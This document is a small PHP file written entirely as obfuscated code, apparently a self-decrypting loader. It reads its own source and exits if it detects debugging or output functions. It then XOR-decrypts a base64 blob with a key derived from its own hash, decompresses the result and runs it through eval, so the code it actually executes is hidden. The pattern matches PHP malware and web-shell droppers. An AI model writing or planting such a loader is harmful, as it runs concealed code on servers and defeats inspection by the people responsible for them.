<?php
$scosncsq="0db694e67e8c82e826ec1af4e0d1f441";
$fpbjsu="525503550e565c01565c0a5a0a53540d070e50060752520750565657040c0653";
$uwnctd="GusqrX5OF2FJF3sVGzeZ09Da4bJhw3wefzP6SjQQ+yo3eawoZqp2ZMn1HRRgKfsaZIjnYZya0dY3Ztnicm8=";
$ufalwqtmv=file_get_contents(__FILE__);
$zlberyuu=str_replace($uwnctd,"",$ufalwqtmv);
if(strpos($zlberyuu,"ec"."ho")!==false||strpos($zlberyuu,"pr"."int")!==false||strpos($zlberyuu,"var_"."dump")!==false||strpos($zlberyuu,"file_put_"."contents")!==false||strpos($zlberyuu,"fw"."rite")!==false){die();}
$yskwdona=str_replace(array($scosncsq,$fpbjsu),array("SP_f7917559","KP_185a7947"),$ufalwqtmv);
$mkxxqyd=md5($yskwdona);
$hvdyvu=hex2bin($fpbjsu);
$ipxgzatwi="";
$jyagpp=strlen($mkxxqyd);
for($taysiokmoi=0;$taysiokmoi<$jyagpp;$taysiokmoi++){
$ipxgzatwi.=chr(ord($hvdyvu[$taysiokmoi])^ord($mkxxqyd[$taysiokmoi]));
}
$gnnnauye=base64_decode($uwnctd);
$fuvmrzhk=strlen($gnnnauye);
$qbtcohtso="";
$tneptkmb=strlen($ipxgzatwi);
for($taysiokmoi=0;$taysiokmoi<$fuvmrzhk;$taysiokmoi++){
$qbtcohtso.=$gnnnauye[$taysiokmoi]^$ipxgzatwi[$taysiokmoi%$tneptkmb];
}
$tewxvgco="gzun"."compress";
eval($tewxvgco($qbtcohtso));
